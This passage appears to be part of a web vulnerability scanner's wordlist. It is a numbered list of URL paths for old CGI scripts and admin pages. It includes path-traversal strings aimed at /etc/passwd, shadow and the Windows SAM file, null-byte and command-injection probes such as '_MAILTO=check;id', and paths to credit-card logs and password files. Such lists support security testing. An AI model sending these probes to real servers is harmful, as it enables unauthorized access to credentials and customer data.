[437]
/scripts/visadmin.exe
[438]
/scripts/wa.exe
[439]
/scripts/webbbs.exe
[440]
/scripts/wguest.exe
[441]
/scripts/wsisa.dll
[442]
/search
[443]
/search.dll?search?query=%00&logic=AND
[444]
/search.dll?search?query=/&logic=AND
[445]
/search97.vts
[446]
/secure/.htaccess
[447]
/secure/.wwwacl
[448]
/server-info
[449]
/server-status
[450]
/servlet/SessionServlet
[451]
/session/adminlogin
[452]
/showfile.asp
[453]
/smdata.dat
[454]
/srchadm 
[455]
/ssi/envout.bat
[456]
/today.nsf
[457]
/tree.dat
[458]
/user.dat
[459]
/user.log
[460]
/WebShop/logs/cc.txt
[461]
/WebShop/logs/ck.log
[462]
/WebShop/templates/cc.txt
[463]
/ws_ftp.ini
[464]
/wwwboard.pl
[465]
/wwwboard/passwd.txt
[466]
\\../readme.txt

[CGI-UNIX]
/../../../../../etc/passwd
[1]
/../../../../etc/passwd
[2]
/../../../etc/passwd
[3]
/../../etc/passwd
[4]
/../../passwd
[5]
/../../shadow
[6]
/.htaccess/
[7]
/.htpasswd/
[8]
/.jpilot/
[9]
//WEB-INF/
[10]
/accept/
[11]
/access.log
[12]
/access-log
[13]
/acid/
[14]
/acid/acid_main.php
[15]
/admin.php3?admin=anything
[16]
/admin/
[17]
/administrator/
[18]
/adminlogin?RCpage=/sysadmin/index.stm
[19]
/adpassword.txt
[20]
/backup/
[21]
/banners.php?op=Change
[22]
/bbs/
[23]
/bbs/admin/
[24]
/bbs/admin/config/
[25]
/bbs/data/
[26]
/bbs/db/
[27]
/bbs/include/
[28]
/cache-stats/
[29]
/card/
[30]
/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd
[31]
/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server
[32]
/caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini
[33]
/caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC
[34]
/caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000
[35]
/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:\WINNT\repair\sam._
[36]
/cgi-auth/userreg.cgi
[37]
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
[38]
/cgi-bin/ad.cgi
[39]
/cgi-bin/adcycle
[40]
/cgi-bin/admin/admin
[41]
/cgi-bin/aglimpse
[42]
/cgi-bin/allmanage.pl
[43]
/cgi-bin/allmanageup.pl
[44]
/cgi-bin/amlite/amadmin.pl
[45]
/cgi-bin/anacondaclip.pl?template=check
[46]
/cgi-bin/AnyForm2
[47]
/cgi-bin/AT-admin.cgi
[48]
/cgi-bin/AT-generate.cgi
[49]
/cgi-bin/auktion.pl
[50]
/cgi-bin/awl/auctionweaver.pl
[51]
/cgi-bin/bb-hist.sh
[52]
/cgi-bin/bbs_forum.cgi
[53]
/cgi-bin/bizdb1-search.cgi
[54]
/cgi-bin/bnbform.cgi
[55]
/cgi-bin/Board/db/
[56]
/cgi-bin/build.cgi
[57]
/cgi-bin/cached_feed.cgi
[58]
/cgi-bin/cachemgr.cgi
[59]
/cgi-bin/cal_make.pl
[60]
/cgi-bin/calender.pl
[61]
/cgi-bin/calender_admin.pl
[62]
/cgi-bin/campas
[63]
/cgi-bin/cgiforum.pl
[64]
/cgi-bin/cgiwrap
[65]
/cgi-bin/changepw.cgi
[66]
/cgi-bin/classifieds.cgi
[67]
/cgi-bin/commerce.cgi?page=check
[68]
/cgi-bin/Count.cgi
[69]
/cgi-bin/counterfiglet/nc/f
[70]
/cgi-bin/CrazyWWWBoard.cgi
[71]
/cgi-bin/cvsweb/cvsweb.cgi
[72]
/cgi-bin/day5datacopier.cgi
[73]
/cgi-bin/day5datanotifier.cgi
[74]
/cgi-bin/db2www/library/document.d2w/show
[75]
/cgi-bin/dcadmin.cgi
[76]
/cgi-bin/dcboard.cgi
[77]
/cgi-bin/dcforumlib.pl
[78]
/cgi-bin/dmailweb.cgi
[79]
/cgi-bin/dnewsweb.cgi
[80]
/cgi-bin/dumpenv.pl
[81]
/cgi-bin/edit.pl
[82]
/cgi-bin/empower?DB=UkRteamHole
[83]
/cgi-bin/environ.cgi
[84]
/cgi-bin/everythingform.cgi
[85]
/cgi-bin/ezshopper2/loadpage.cgi
[86]
/cgi-bin/ezshopper3/loadpage.cgi
[87]
/cgi-bin/faxsurvey
[88]
/cgi-bin/filemail.pl
[89]
/cgi-bin/files.pl
[90]
/cgi-bin/finger
[91]
/cgi-bin/formmail.cgi
[92]
/cgi-bin/gbook/gbook.cgi?_MAILTO=check;id
[93]
/cgi-bin/getdoc.cgi
[94]
/cgi-bin/glimpse
[95]
/cgi-bin/global.cgi
[96]
/cgi-bin/guestbook.pl
[97]
/cgi-bin/handler
[98]
/cgi-bin/hsx.cgi
[99]
/cgi-bin/htgrep
[100]
/cgi-bin/htmlscript
[101]
/cgi-bin/htsearch
[102]
/cgi-bin/htsearch?config=aaa
[103]
/cgi-bin/ikonboard/help.cgi
[104]
/cgi-bin/info2www
[105]
/cgi-bin/infosrch.cgi
[106]
/cgi-bin/ipf/etc/gfw/ui/pwd.dat
[107]
/cgi-bin/jj
[108]
/cgi-bin/lasso.cgi
[109]
/cgi-bin/loadpage.cgi
[110]
/cgi-bin/mailfile.cgi
[111]
/cgi-bin/mailform.pl
[112]
/cgi-bin/maillist.pl
[113]
/cgi-bin/mailnews.cgi
[114]
/cgi-bin/mailto.cgi
[115]
/cgi-bin/man.sh
[116]
/cgi-bin/mdma.bat
[117]
/cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=
[118]
/cgi-bin/netauth.cgi
[119]
/cgi-bin/news/news.cgi
[120]
/cgi-bin/newsdesk.cgi?t=../pass.txt
[121]
/cgi-bin/nph-maillist.pl
[122]
/cgi-bin/nph-publish
[123]
/cgi-bin/nph-test-cgi
[124]
/cgi-bin/pagelog.cgi
[125]
/cgi-bin/pals-cgi
[126]
/cgi-bin/perl
[127]
/cgi-bin/perlshop.cgi
[128]
/cgi-bin/pfdisplay.cgi
[129]
/cgi-bin/phf
[130]
/cgi-bin/phf.cgi
[131]
/cgi-bin/php
[132]
/cgi-bin/php.cgi
[133]
/cgi-bin/plusmail
[134]
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00
[135]
/cgi-bin/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&TopicSubject=&replyto=0
[136]
/cgi-bin/post-query
[137]
/cgi-bin/processit.pl
[138]
/cgi-bin/query
[139]
/cgi-bin/redirect.cgi
[140]
/cgi-bin/register.cgi
[141]
/cgi-bin/replicator/webpage.cgi
[142]
/cgi-bin/responder.cgi
[143]
/cgi-bin/rpm_query
[144]
/cgi-bin/rwwwshell.pl
[145]
/cgi-bin/s.cgi?q=a&tmpl=check
[146]
/cgi-bin/scripts/whois.cgi?action=load&whois=check
[147]
/cgi-bin/search.cgi?letter=
[148]
/cgi-bin/Search.pl
[149]
/cgi-bin/search/tidfinder.cgi?2956734
[150]
/cgi-bin/simplestguest.cgi
[151]
/cgi-bin/simplestmail.cgi
[152]
/cgi-bin/ssi
[153]
/cgi-bin/store.cgi?StartID=../etc/hosts%00.html
[154]
/cgi-bin/subscribe.pl
[155]
/cgi-bin/survey.cgi
[156]
/cgi-bin/test-cgi
[157]
/cgi-bin/textcounter.pl
[158]
/cgi-bin/ultraboard.cgi
[159]
/cgi-bin/unlg1.1
[160]
/cgi-bin/unlg1.2
[161]
/cgi-bin/upload_file.pl
[162]
/cgi-bin/ustorekeeper.pl
[163]
/cgi-bin/view_page.html
[164]
/cgi-bin/view-source
[165]
/cgi-bin/w3-msql
[166]
/cgi-bin/wais.pl
[167]
/cgi-bin/webdata.cgi
[168]
/cgi-bin/webdist.cgi
[169]
/cgi-bin/webdriver
[170]
/cgi-bin/webgais
[171]
/cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml
[172]
/cgi-bin/websendmail
[173]
/cgi-bin/webspirs.cgi
[174]
/cgi-bin/webwho.pl
[175]
/cgi-bin/whois_raw.cgi
[176]
/cgi-bin/wrap
[177]
/cgi-bin/wrap.cgi
[178]
/cgi-bin/wwwboard.pl
[179]
/cgi-bin/www-sql
[180]
/cgi-bin/Xrun.cgi
[181]
/cgi-bin/YaBB.pl
[182]
/cgi-bin-sdb
[183]
/class/mysql.class
[184]
/config/
[185]
/ConsoleHelp/login.jsp
[186]
/customer/
[187]
/data/
[188]
/database/
[189]
/databases/
[190]
/db/
[191]
/dbase/
[192]
/deny/
[193]
/devel/
[194]
/docs/
[195]
/document/
[196]
/documents/
[197]
/domcfg.nsf
[198]
/domlog.nsf
[199]
/down/
[200]
/download/
[201]
/downloads/
[202]
/example/
[203]
/examples/applications/bboard/bboard_frames.html
[204]
/examples/jsp/num/numguess.js%70
[205]
/exec/show/config/cr
[206]
/file/
[207]
/files/
[208]
/forum/
[209]
/forum/common.php
[210]
/ftp/
[211]
/girl/
[212]
/girls/
[213]
/hire/
[214]
/htdocs/
[215]
/html/snort2html.html
[216]
/idea/
[217]
/ideas/
[218]
/image/
[219]
/images/
[220]
/img/
[221]
/inc/
[222]
/inc/sendmail.inc
[223]
/include/
[224]
/include/inc/
[225]
/includes/
[226]
/includes/global.inc
[227]
/incoming/
[228]
/index.html.bak
[229]
/index.html~
[230]
/index.js%2570
[231]
/index.php.bak
[232]
/index.php~
[233]
/index.php3?vhosts[test]=
[234]
/install/
[235]
/lib/
[236]
/library/
[237]
/linux/
[238]
/log.htm
[239]
/log.html
[240]
/log.nsf
[241]
/log.txt
[242]
/log/
[243]
/logfile
[244]
/logfile.htm
[245]
/logfile.html
[246]
/logfile.txt
[247]
/logfile/
[248]
/logfiles/
[249]
/logger.html
[250]
/logger/
[251]
/logging/
[252]
/login.jsp
[253]
/logs/
[254]
/logs/access_log
[255]
/manage/cgi/cgiproc
[256]
/manual/
[257]
/misc/
[258]
/mp3/
[259]
/mrtg/
[260]
/msql/
[261]
/mysql/
[262]
/names.nsf
[263]
/ncl_items.html?SUBJECT=2097
[264]
/Newuser?Image=../../database/rbsserv.mdb
[265]
/number/
[266]
/opendir.php?requesturl=/etc/passwd
[267]
/pccsmysqladm/incs/dbconnect.inc
[268]
/pds/
[269]
/perl


----

Chapulino



0x00
